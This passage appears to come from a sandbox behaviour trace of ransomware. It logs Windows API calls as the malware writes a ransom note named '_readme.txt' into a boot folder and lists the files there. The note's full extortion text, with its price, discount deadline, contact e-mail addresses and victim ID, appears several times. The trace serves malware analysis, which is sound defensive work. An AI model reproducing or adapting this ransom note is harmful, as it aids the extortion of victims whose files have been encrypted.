overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.840] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.840] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.840] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.841] CloseHandle (hObject=0x5c8) returned 1 [0093.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.842] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.842] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.842] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.842] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.842] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa179a960, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa179a960, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa179a960, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.842] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.843] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.849] HeapFree (in: hHeap=0x630000, 